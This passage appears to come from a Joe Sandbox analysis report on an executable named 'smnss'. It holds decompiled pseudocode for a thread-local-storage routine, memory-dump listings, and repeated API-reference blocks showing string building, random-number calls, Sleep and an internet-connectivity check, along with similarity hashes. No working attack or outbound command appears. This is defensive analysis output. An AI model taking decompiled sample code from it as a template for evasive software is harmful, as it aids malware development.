                                                                          				long _t24;
                                                                          				void* _t25;
                                                                          				int _t28;
                                                                          				intOrPtr _t38;
                                                                          				int _t40;
                                                                          				intOrPtr* _t49;
                                                                          				long* _t50;
                                                                          
                                                                          				_t43 = __esi;
                                                                          				_t32 = __ebx;
                                                                          				_v8 = __edi;
                                                                          				_t40 = _a4;
                                                                          				_v16 = __ebx;
                                                                          				_v12 = __esi;
                                                                          				_t38 =  *0x418284;
                                                                          				if(_t38 == 0) {
                                                                          					E0040B0E0(_t20);
                                                                          					_t38 =  *0x418284;
                                                                          					if( *((intOrPtr*)(_t38 + 0x30)) >= 0) {
                                                                          						goto L2;
                                                                          					} else {
                                                                          						goto L7;
                                                                          					}
                                                                          				} else {
                                                                          					if( *((intOrPtr*)(_t38 + 0x30)) < 0) {
                                                                          						L7:
                                                                          						E0040B3B0(_t32, _t43);
                                                                          						_t38 =  *0x418284;
                                                                          						if( *((intOrPtr*)(_t38 + 0x30)) == 0) {
                                                                          							goto L3;
                                                                          						} else {
                                                                          							goto L9;
                                                                          						}
                                                                          					} else {
                                                                          						L2:
                                                                          						if( *((intOrPtr*)(_t38 + 0x30)) != 0) {
                                                                          							L9:
                                                                          							_t24 = GetLastError();
                                                                          							 *_t49 =  *((intOrPtr*)(_t38 + 0x2c));
                                                                          							_t25 = TlsGetValue(??);
                                                                          							_t50 = _t49 - 4;
                                                                          							 *_t50 = _t24;
                                                                          							SetLastError(??);
                                                                          							 *_t40 = _t25;
                                                                          							_v24 = _t40;
                                                                          							 *((intOrPtr*)(_t50 - 4)) =  *((intOrPtr*)( *0x418284 + 0x2c));
                                                                          							_t28 = TlsSetValue(??, ??);
                                                                          							if(_t28 == 0) {
                                                                          								goto __ecx;
                                                                          							}
                                                                          						} else {
                                                                          							L3:
                                                                          							_t28 =  *(_t38 + 0x28);
                                                                          							 *_t40 = _t28;
                                                                          							 *(_t38 + 0x28) = _t40;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return _t28;
                                                                          			}















                                                                          0x0040b460
                                                                          0x0040b460
                                                                          0x0040b466
                                                                          0x0040b469
                                                                          0x0040b46c
                                                                          0x0040b46f
                                                                          0x0040b472
                                                                          0x0040b47a
                                                                          0x0040b4a0
                                                                          0x0040b4a5
                                                                          0x0040b4b0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040b47c
                                                                          0x0040b481
                                                                          0x0040b4c0
                                                                          0x0040b4c0
                                                                          0x0040b4c5
                                                                          0x0040b4d0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040b483
                                                                          0x0040b483
                                                                          0x0040b488
                                                                          0x0040b4e0
                                                                          0x0040b4e3
                                                                          0x0040b4e9
                                                                          0x0040b4ee
                                                                          0x0040b4f4
                                                                          0x0040b4f9
                                                                          0x0040b4fc
                                                                          0x0040b502
                                                                          0x0040b50f
                                                                          0x0040b513
                                                                          0x0040b516
                                                                          0x0040b521
                                                                          0x0040b539
                                                                          0x0040b539
                                                                          0x0040b48a
                                                                          0x0040b48a
                                                                          0x0040b48a
                                                                          0x0040b48d
                                                                          0x0040b48f
                                                                          0x0040b48f
                                                                          0x0040b488
                                                                          0x0040b481
                                                                          0x0040b49e

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00405F1A), ref: 0040B4E3
                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,00405F1A), ref: 0040B4EE
                                                                          • SetLastError.KERNEL32(?,?,?,?,?,?,00405F1A), ref: 0040B4FC
                                                                          • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,00405F1A), ref: 0040B516
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastValue
                                                                          • String ID:
                                                                          • API String ID: 1151882462-0
                                                                          • Opcode ID: 16660377808b608b832b0cbaea9d7365e9406ce6128743baf1b4238b0422be3c
                                                                          • Instruction ID: 439973a8ce157f22f3a963889ba98c70b340b09c43d7307190215458f466d12f
                                                                          • Opcode Fuzzy Hash: 16660377808b608b832b0cbaea9d7365e9406ce6128743baf1b4238b0422be3c
                                                                          • Instruction Fuzzy Hash: 8B210375A0060A9FCB40DF69DA8469ABBF4FF48310F1081AADC44A7352E734BE51CBC9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcat.KERNEL32 ref: 00402B31
                                                                            • Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
                                                                            • Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
                                                                            • Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5
                                                                          • lstrcat.KERNEL32 ref: 00402B59
                                                                          • lstrcat.KERNEL32 ref: 00402B81
                                                                          • Sleep.KERNEL32 ref: 00402EC5
                                                                          • lstrcat.KERNEL32 ref: 00402BA3
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
                                                                          • String ID:
                                                                          • API String ID: 1562643418-0
                                                                          • Opcode ID: 2826283af6f699d7c3e83025989127017e0512d040b59a07861e73eee1f0863b
                                                                          • Instruction ID: 03b09b6922a9c514b299c22ddce90b04ecaf30bc7003352be57799a9fe594460
                                                                          • Opcode Fuzzy Hash: 2826283af6f699d7c3e83025989127017e0512d040b59a07861e73eee1f0863b
                                                                          • Instruction Fuzzy Hash: C121FCB59143148BCB10EF64D9816DEBBF4BB84314F40857FE584A3281EB389698CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcat.KERNEL32 ref: 0040294A
                                                                            • Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
                                                                            • Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
                                                                            • Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5
                                                                          • lstrcat.KERNEL32 ref: 00402972
                                                                          • lstrcat.KERNEL32 ref: 0040299A
                                                                          • Sleep.KERNEL32 ref: 00402EC5
                                                                          • lstrcat.KERNEL32 ref: 004029BC
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
                                                                          • String ID:
                                                                          • API String ID: 1562643418-0
                                                                          • Opcode ID: eb2a7022fab22290f9337c8e99424667dadfbef0a52a594ea57fdecd6ba1bcb4
                                                                          • Instruction ID: 058901da40b0e2efb01319e0cab41814326d79342e400853ca70bd999cd91e9a
                                                                          • Opcode Fuzzy Hash: eb2a7022fab22290f9337c8e99424667dadfbef0a52a594ea57fdecd6ba1bcb4
                                                                          • Instruction Fuzzy Hash: AE21EE759143148BC710EF64D98169EBBF4FB84314F00897FE5C5A3241EB389698CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcat.KERNEL32 ref: 00402D33
                                                                          • lstrcat.KERNEL32 ref: 00402D4D
                                                                            • Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
                                                                            • Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
                                                                            • Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5
                                                                          • lstrcat.KERNEL32 ref: 00402D75
                                                                          • Sleep.KERNEL32 ref: 00402EC5
                                                                          • lstrcat.KERNEL32 ref: 00402D97
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
                                                                          • String ID:
                                                                          • API String ID: 1562643418-0
                                                                          • Opcode ID: 0b97575310a7fa724369c596606ff1760cc3b7cec2d0dbe3f6b4ef6916d691dc
                                                                          • Instruction ID: c94e486dd441945c80f89e6855cf6e362e59878be9d52d1e169f04df5a17e1bb
                                                                          • Opcode Fuzzy Hash: 0b97575310a7fa724369c596606ff1760cc3b7cec2d0dbe3f6b4ef6916d691dc
                                                                          • Instruction Fuzzy Hash: 8521ECB69143148BCB10EF64D9816DEBBF4BB84314F40857FE589A3241EB349698CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcat.KERNEL32 ref: 00402871
                                                                          • lstrcat.KERNEL32 ref: 0040288B
                                                                            • Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
                                                                            • Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
                                                                            • Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5
                                                                          • lstrcat.KERNEL32 ref: 004028B3
                                                                          • Sleep.KERNEL32 ref: 00402EC5
                                                                          • lstrcat.KERNEL32 ref: 004028D5
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
                                                                          • String ID:
                                                                          • API String ID: 1562643418-0
                                                                          • Opcode ID: 27d8094f7ce17b5c984ca7facbf4f5c21df0b35fc8132f7ae4f869e5194c155d
                                                                          • Instruction ID: a2a94c62469e04ea526b3170561a4d1959144f6524308fe89c3ba5c1d6912741
                                                                          • Opcode Fuzzy Hash: 27d8094f7ce17b5c984ca7facbf4f5c21df0b35fc8132f7ae4f869e5194c155d
                                                                          • Instruction Fuzzy Hash: 2F21ED769043048BC710EF64D9815CEBBF4FB84314F40857FE985A3241EB349698CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%